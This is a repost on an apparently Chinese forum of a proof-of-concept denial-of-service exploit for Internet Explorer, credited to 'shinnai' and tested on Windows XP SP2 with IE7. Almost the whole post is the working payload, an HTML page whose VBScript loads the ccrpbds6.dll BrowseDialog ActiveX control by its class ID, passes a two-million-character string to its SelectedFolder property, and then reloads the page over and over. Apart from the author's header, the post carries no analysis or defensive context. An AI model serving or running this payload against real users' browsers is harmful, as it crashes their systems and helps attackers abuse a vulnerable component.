发新话题
打印

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

复制内容到剪贴板
代码:
<!--
-----------------------------------------------------------------------------------------------------------
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------------
-->
<html>
<object classid=&#39;clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153&#39; id=&#39;CCRP_BDc&#39;></object>
<script language=&#39;vbscript&#39;>

argCount = 1

arg1=String(2000000, "A")

CCRP_BDc.SelectedFolder = arg1
</script>

<script language=&#39;javascript&#39;>
document.location.reload()
</script>

TOP

发新话题